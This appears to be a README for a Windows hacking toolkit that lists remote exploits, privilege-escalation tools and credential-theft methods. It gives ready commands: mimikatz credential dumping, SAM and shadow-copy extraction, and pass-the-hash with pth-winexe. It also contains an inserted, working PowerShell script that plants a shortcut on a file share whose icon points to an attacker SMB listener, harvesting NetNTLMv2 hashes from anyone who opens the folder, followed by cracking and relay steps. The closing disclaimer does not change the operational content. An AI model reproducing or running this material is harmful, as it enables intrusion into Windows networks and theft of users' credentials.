WHP – Microsoft Windows Hacking Pack

M$ Windows Hacking Pack
===========

Tools here are from different sources. The repo as a whole is licensed under the WTFPL, but some content may not be (e.g. Sysinternals).
"pes" in a file name means "PE Scrambled" (a scrambled copy of the PE binary). It is useful sometimes.

Remote Exploits
===========

Windows 2000 / XP SP1
MS05-039 Microsoft Plug and Play Service Overflow, works over SSDP too
http://www.rapid7.com/db/modules/exploit/windows/smb/ms05_039_pnp

Windows NT/2000/XP (unpatched, before XP SP2)/2003
MS03-026 Microsoft RPC DCOM Interface Overflow (kaht2.zip)
http://www.securityfocus.com/bid/8205/exploit

Windows XP (SP2 and SP3) (can also be used for priv esc)
MS08-067 Remote Stack Overflow Vulnerability Exploit in the Server service (srvsvc)
https://www.exploit-db.com/exploits/7104/

Windows 7 and Server 2008 R2 (x64), all service packs
MS17-010 aka "EternalBlue"
https://github.com/RiskSense-Ops/MS17-010

Windows Server 2016 (DoS, may lead to code execution)
"Fuzzing SMB" video showing the crash: https://www.youtube.com/watch?v=yDae5-lIQb8

Privilege Escalation
===========

First, if you have a Meterpreter session, it may be a good idea to try "getsystem".

srvcheck3.exe
=====
Privilege escalation for Windows XP SP2 and before.
It exploits services with weak DACLs (e.g. upnphost, SSDPSRV) by reconfiguring the service binary path. http://seclists.org/fulldisclosure/2006/Feb/231
Example: srvcheck3.exe -m upnphost -H 127.0.0.1 -c "cmd.exe /c c:\Inetpub\wwwroot\shell.exe"

KiTrap0D.tar
=====
Privilege escalation for Microsoft Windows NT/2000/XP/2003/Vista/2008/7 (32-bit only: the vulnerable VDM code path does not exist on x64)
MS10-015 / CVE-2010-0232 / https://www.exploit-db.com/exploits/11199/

Other exploits listed (by OS)
=====
Windows XP SP2 (and before)
srvcheck3.exe - weak permissions on the upnphost or SSDPSRV service (see above)

Windows XP/2003
MS11-080 → Local Privilege Escalation Exploit, Afd.sys
https://www.exploit-db.com/exploits/18176/

Windows Vista/7
CVE-2010-4398 → Elevation of Privileges (UAC bypass)
http://www.securityfocus.com/bid/45045/exploit

Windows 8.1 (and before)
MS14-058 → TrackPopupMenu Privilege Escalation
https://www.exploit-db.com/exploits/37064/

Windows 8.1 (and before)
MS15-051 → Win32k LPE vulnerability used in the APT attack "taihou32"
https://www.exploit-db.com/exploits/37049/

Windows NT/2K/XP/2K3/Vista/2K8/7 (32-bit)
KiTrap0D → MS10-015 / CVE-2010-0232 local ring-0 exploit (see above)
https://www.exploit-db.com/exploits/11199/

Windows 10 (and before)
Hot Potato (NBNS spoofing + WPAD + SMB NTLM relay)
Hot Potato – Windows Privilege Escalation

Windows 10 (and before)
Link/URL based capture of NetNTLM hashes, e.g. by sending a .lnk file in email or dropping it on a file share. No click is needed: Explorer fetches the icon when it renders the folder.
Technique presented here: https://www.youtube.com/watch?v=cuF_Ibo-mmM
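As an added example (not part of the WHP README or of any tool it lists), the following PowerShell builds such a .lnk: the shortcut's icon is set to a UNC path on an attacker-controlled host, so Explorer authenticates to that host over SMB as soon as the folder containing the file is displayed. The listener address 10.1.1.5, the share \\fileserver\public and the file names are placeholders.

```powershell
# Added example, not from the WHP README.
# Drops a shortcut whose icon lives on an attacker SMB listener; every user who opens
# the folder sends a NetNTLMv2 challenge/response to that listener.
# Assumptions (placeholders): listener at 10.1.1.5, writable share \\fileserver\public.
$listener = '10.1.1.5'
$dropPath = '\\fileserver\public\Q3-report.lnk'

$shell = New-Object -ComObject WScript.Shell
$lnk = $shell.CreateShortcut($dropPath)
$lnk.TargetPath   = 'C:\Windows\System32\notepad.exe'   # harmless target; never launched for the capture
$lnk.IconLocation = "\\$listener\share\report.ico"     # UNC icon => SMB authentication on folder render
$lnk.Description  = 'Q3 report'
$lnk.Save()

# Read the file back and confirm the UNC icon path was stored.
$check = $shell.CreateShortcut($dropPath)
if ($check.IconLocation -notlike "\\$listener\*") { throw "IconLocation was not written as expected" }
"Dropped $dropPath with IconLocation $($check.IconLocation)"
```

Capture the authentication with Responder or impacket's smbserver.py. What arrives is a NetNTLMv2 challenge/response, not the NT hash: it can be cracked offline (hashcat mode 5600) or relayed with ntlmrelayx to a host that does not enforce SMB signing, but it cannot be used directly for pass-the-hash.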


Backup copies of the SAM
Windows\system32\config\SAM (the live hive, locked while Windows is running)
WINDOWS\repair\SAM (backup copy on XP/2003)
regedit.exe HKEY_LOCAL_MACHINE -> SAM

Tools to get the SAM database if it is locked: pwdump, samdump, samdump2, Cain & Abel.
Otherwise just copy it. Take the SYSTEM hive as well: it holds the boot key needed to decrypt the SAM hashes.

Dump SAM through a shadow volume
If a shadow copy can be created, the locked hive can be copied out of it.
Server 2003/2008 command: vssadmin create shadow /for=C: (the client-edition vssadmin has no "create shadow" subcommand; use diskshadow or WMI there)
Server 2008 (and later) command: diskshadow

Windows Credentials Editor
WCE / Windows Credentials Editor can recover password hashes from LSASS - http://www.ampliasecurity.com/research/wcefaq.html
WCE supports Windows XP, 2003, Vista, 7 and 2008 (all SPs, 32-bit and 64-bit versions).

Mimikatz dumping (lsadump::sam reads the SAM from the registry and needs SYSTEM, so impersonate a SYSTEM token first with token::elevate)
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam

Cachedump aka in-memory attacks for SAM hashes / cached domain credentials
fgdump.exe (contains pwdump and cachedump, can read from memory)

SAM dump (hive)
"A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data."

Dump SAM, then spray hashes
keimpx (try hashes with different users, against domain accounts)
http://code.google.com/p/keimpx/

LSA dumping (memory) / Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP
LSAdump2, LSASecretsDump, pwdumpx, gsecdump or Cain & Abel
https://github.com/CoreSecurity/impacket
http://packetstormsecurity.org/files/view/10457/lsadump2.zip
http://www.nirsoft.net/utils/lsa_secrets_dump.html
http://packetstormsecurity.org/files/view/62371/PWDumpX14.zip

PassTheHash (Windows 8.1 / 2012 R2 added LSASS hardening against credential theft, but NTLM authentication with a stolen NT hash still works against any host that accepts NTLM)
pth-winexe --user='pc.local/Administrator%aad3b435b51404eeaad3b435b51404ee:<NT hash>' //10.1.1.1 cmd
(format is DOMAIN/user%LMHASH:NTHASH; the LM half shown is the constant for an empty LM hash, which is what Vista and later store)

PassTheTicket (Kerberos)
mimikatz can do it (kerberos::ptt injects a stolen .kirbi ticket into the current session)

Duplicate access tokens (if an admin access token can be impersonated, it's a win)
http://sourceforge.net/projects/incognito/

Token "Kidnapping"
MS09-012, Churrasco.bin shell.bin (runs shell.bin as NT AUTHORITY\SYSTEM)
http://carnal0wnage.attackresearch.com/2010/05/playing-with-ms09-012-windows-local.html

Other notable tools
psexec, smbshell, Metasploit's psexec, etc.
https://github.com/BloodHoundAD/BloodHound - visualises relationships in an AD domain and finds short escalation paths.

To Be Added
===========
- http://www.nirsoft.net/ --> Stuff for dumping passwords
- openvpn
- evilgrade

Hashes (SHA256) and VirusTotal scans
===========

8ee65368afcd98ea660f5161f9cbe0c4c08863018f28e5eb024d8db58b234333  AwesomerShell.tar
7487ec568b6e2547ef30957610e60df3089d916f043b02da1167959dd9e0c051  KiTrap0D.tar
96f17857f3eb28a7d93dad930bc099a3cb65a9a2afb37069bfd1ba5ec5964389  LICENSE.t

¯\_(ツ)_/¯

Note: this information is provided for research, education or auditing. Use for personal gain is punishable under the law of the Russian Federation.
